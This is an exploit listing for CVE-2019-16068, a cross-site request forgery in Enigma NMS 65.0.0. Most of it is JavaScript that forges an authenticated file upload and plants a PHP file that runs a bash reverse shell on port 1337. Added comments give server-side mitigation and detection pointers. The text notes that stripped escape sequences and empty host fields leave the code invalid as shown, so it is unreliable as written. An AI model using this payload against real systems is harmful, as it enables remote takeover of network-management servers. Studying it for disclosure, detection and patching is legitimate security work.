

Enigma NMS 65.0.0 – Cross-Site Request Forgery



#--------------------------------------------------------------------#
# Exploit Title: Enigma NMS Cross-Site Request Forgery (CSRF)        #
# Date:  21 July 2019                                                #
# Author: Mark Cross (@xerubus | mogozobo.com)                       #
# Vendor: NETSAS Pty Ltd                                             #
# Vendor Homepage:  https://www.netsas.com.au/                       #
# Software Link: https://www.netsas.com.au/enigma-nms-introduction/  #
# Version: Enigma NMS 65.0.0                                         #
# CVE-IDs: CVE-2019-16068                                            #   
# Full write-up: https://www.mogozobo.com/?p=3647                    #
#--------------------------------------------------------------------#
        _  _
  ___ (~ )( ~)
 /   _ / /   
|   D_ ] /        -= Enigma CSRF by @xerubus =-       
|   D _]/      -= We all have something to hide =-
 ___/ / / 
      (_ )( _)
      @Xerubus    

The following CSRF will create a PHP file for executing a reverse shell on port 1337 via the user upload functionality within the NMS web application.


  // Rewrites the visible browser URL to "/" without reloading the page;
  // this has no effect on the request built below.
  history.pushState('', '', '/')
  
    // Proof of concept for CVE-2019-16068: a forged cross-site POST to
    // manage_files.cgi. Nothing in the request is a per-session secret
    // (no anti-CSRF token); it relies only on the victim's ambient session
    // cookie being attached by the browser (withCredentials below).
    //
    // Mitigation (server side): require a per-request CSRF token on
    // manage_files.cgi, set the session cookie with SameSite, verify the
    // Origin/Referer header, and reject executable (.php) content in
    // user uploads.
    // Detection: POSTs to /cgi-bin/protected/manage_files.cgi carrying
    // action=system_upgrade and action_aux=upload_file_complete from a
    // cross-origin Origin/Referer, or any .php file name in upfile_name.
    //
    // NOTE: as extracted on this page the string literals below have lost
    // their escape sequences, so this listing is not valid JavaScript as shown.
    function submitRequest()
    {
      var xhr = new XMLHttpRequest();
      // Host portion of the URL is empty in this listing.
      xhr.open("POST", "http:///cgi-bin/protected/manage_files.cgi", true);
      xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
      xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
      // The boundary here must match the one used in the body below.
      xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------208051173310446317141640314495");
      // Attach the victim's cookies to the cross-origin request; this is the
      // property that makes the forged request authenticated.
      xhr.withCredentials = true;

      // Hand-built multipart/form-data body with four parts: action,
      // action_aux, the uploaded file (evil.php, whose content is the
      // reverse-shell stub described at the top of the page) and upfile_name.
      var body = "-----------------------------208051173310446317141640314495rn" + 
        "Content-Disposition: form-data; name="action"rn" + 
        "rn" + 
        "system_upgradern" + 
        "-----------------------------208051173310446317141640314495rn" + 
        "Content-Disposition: form-data; name="action_aux"rn" + 
        "rn" + 
        "upload_file_completern" + 
        "-----------------------------208051173310446317141640314495rn" + 
        "Content-Disposition: form-data; name="upfile"; filename="evil.php"rn" + 
        "Content-Type: application/x-phprn" + 
        "rn" + 
        "x3c?phpn" + 
        "n" + 
        "exec("/bin/bash -c 'bash -i x3e& /dev/tcp//1337 0x3e&1'");n" + 
        "n" + 
        "?x3en" + 
        "rn" + 
        "-----------------------------208051173310446317141640314495rn" + 
        "Content-Disposition: form-data; name="upfile_name"rn" + 
        "rn" + 
        "evil.phprn" + 
        "-----------------------------208051173310446317141640314495--rn";

      // Copy the body, one char code per byte, into a byte array and send it
      // as a raw Blob.
      var aBody = new Uint8Array(body.length);
      for (var i = 0; i < aBody.length; i++)
        aBody[i] = body.charCodeAt(i); 
        // The indentation suggests send() is inside the loop, but the loop has
        // no braces: only the assignment above repeats, send() runs once.
        xhr.send(new Blob([aBody]));
    }
    // Issue the forged request, then navigate the browser to the NMS
    // snmp_browser page (host portion is empty in this listing).
    submitRequest();
    window.location='http:///cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser';
  
  
  

            





https://www.exploit-db.com/exploits/47363
